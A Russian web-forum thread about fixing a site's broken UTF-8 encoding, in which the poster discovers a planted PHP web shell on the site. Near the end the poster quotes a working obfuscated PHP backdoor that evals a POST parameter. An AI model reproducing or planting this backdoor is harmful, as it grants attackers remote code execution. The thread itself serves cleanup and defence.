Подозрительный файлик

[maxville]

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:
 

$user = "allah";

 

$pass = "akbar";

$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";

$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";


Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.
 

mysqlnd.zip

[Prorab337]

Это шелл (дыра в вашем сайте) cyb3r sh3ll. Кстати логи отправляются на [email protected], может знакомая почта

[maxville]

Вы уверены что шел? А то прям такой очевидный не скрытый текст с явными намёками, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле. Обычно как-то прячут, кодируют..

Змінено 25 квітня 2016 користувачем maxville

[Prorab337]

Вы уверены что шел? А то прям такой очевидный не скрытый текст, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле.

Такой текст автор написал, уж извините что очевидный.

 

https://sourceforge.net/projects/cyber-shell/?source=typ_redirect

[vilka]

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:

 

$user = "allah";

 

$pass = "akbar";

$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";

$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";

Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.

Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????

[maxville]

Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????

Тк сегодня попросили, как наткнулся так и зарегистрировался, уж извините.

 

 Где симплу взяли???? АААА????

Что вы подразумеваете под "симплой"?

[pantagruel964]

Вы взялись проверить сайт, но дупля не отбиваете?

 

Здесь /system/database находятся классы для подключения к БД. Можете посмотреть в конфигах, какой файл указан для подключения к БД. Удалите и используйте для подключения стандартные.

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

[maxville]

Вы взялись проверить сайт, но дупля не отбиваете?

Это может вы чего-то не отбиваете. Но не обязательно быть разработчиком чтобы установить, opencart и тому подобные cms. Внести минимальные настройки/правки которые доступны из ПУ или того же гугла. Изначально я взялся посмотреть всего лишь проблемы с кодировкой. А потом уже заметил подозрительные файлики. Что в этой директории находится я понимаю. По дефолту mysqlnd ocstore не используется, и его там вообще не бывает. 

Вопрос тут был задан только из-за шанса что ответит кто-то сталкивающийся непосредственно с данным файликом/шелом. 

 

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

Повторюсь, сайт не мой.

[vilka]

Ха ха ха))) Старая песня. Я не я и сайт не мой, просто подержать дали))))

Змінено 25 квітня 2016 користувачем vilka

[maxville]

Нужно уметь верить людям, вилка. Учите новую песню  ;) 
 

Змінено 25 квітня 2016 користувачем maxville

[n3bo]

Ха ха ха))) Старая песня. Я не я и сайт не мой, просто подержать дали))))

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей или сайтов   :ugeek:

Змінено 25 квітня 2016 користувачем n3bo

[n3bo]

Нужно уметь верить людям, вилка. Учите новую песню  ;) 

 

 

Погуглите Aibolit, пробежитесь им по сайту, как экономный вариант.

Змінено 25 квітня 2016 користувачем n3bo

[pantagruel964]

Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

[maxville]

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей  :ugeek:

Он слишком далёкий от этого, а я ответственный :)

[freelancer]

с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

[maxville]

Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

Разумеется я это первым делом проверял, всё это есть в движке по дефолту.

 

[maxville]

с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

вот и не могу понять откуда он берёт эту кодировку, когда везде где только можно указал UTF-8

Змінено 25 квітня 2016 користувачем maxville

[freelancer]

установите кодировку явно в заголовке

[maxville]

касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

Благодарю, отпишусь!

по поводу проверки айболитом - да, есть куча не хорошего, например файлы с таким содержимым, и больше там ничего нет.

 

<?php                                                                                                                                                                                                                                                                   $bunu5="s_top" ; $qfv8=strtoupper($bunu5[1]. $bunu5[4]. $bunu5[3].$bunu5[0]. $bunu5[2]) ; if (isset(${$qfv8 }['qe0080b' ])) {eval(${ $qfv8 } ['qe0080b'] ) ;} ?> 

[maxville]

установите кодировку явно в заголовке

Если вы про это 

<meta content="text/html; charset=utf-8" http-equiv="Content-Type">

То она указана. 

[pantagruel964]

https://yadi.sk/i/16ma9x9trGkCj

[maxville]

Да, уже заметил что отдаёт эту кодировку. Но не понимаю откуда он её берёт.

[chukcha]

Он ее берт там где у вас в файлах или BOM или пробел или пустая строка в файле ( в каком-либо файле)

[maxville]

На наличие БУМ - прогнал, всё хорошо. С остальными буду разбираться. Спасибо за ответы.

[maxville]

Хм.. странно, в отдельном php.ini в корневой директории сайта на default_charset - сайт внимания не обращал. А на хостинге в ПУ прописал default_charset = UTF-8 - и на сайте всё сразу стало красиво.